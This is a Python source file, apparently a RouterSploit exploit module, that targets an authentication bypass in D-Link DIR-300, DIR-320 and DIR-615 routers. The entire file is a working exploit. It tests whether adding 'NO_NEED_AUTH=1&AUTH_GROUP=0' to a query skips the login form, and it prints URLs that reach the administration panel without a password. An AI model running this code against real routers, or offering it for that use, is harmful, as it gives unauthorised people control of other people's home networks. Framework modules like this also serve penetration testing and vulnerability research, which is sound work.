import requests

from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for D-Link DIR-300, DIR-320, DIR-615 Authentication Bypass vulnerability.
    If the target is vulnerable link to bypass authentication will be provided"
    """
    __info__ = {
        'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
        'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
        'authors': [
            'Craig Heffner',  # vulnerability discovery
            'Karol Celin',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
        ],
        'targets': [
            'D-Link DIR-300',
            'D-Link DIR-600',
            'D-Link DIR-615 revD',
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print "\nYou need to add NO_NEED_AUTH=1&AUTH_GROUP=0 to query string for every action."
            print "\nExamples:"
            print "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
            print "{}:{}/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0\n".format(self.target, self.port)
        else:
            print_error("Target seems to be not vulnerable")

    def check(self):
        # check if it is valid target
        url = sanitize_url("{}:{}/bsc_lan.php".format(self.target, self.port))
        try:
            r = requests.get(url)
            res = r.text
        except:
            return None  # could not be verified

        if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
            return False

        # checking if authentication can be baypassed
        url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
        try:
            r = requests.get(url)
            res = r.text
        except:
            return None  # could not be verified

        if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
            return True  # target vulnerable

        return False  # target not vulnerable
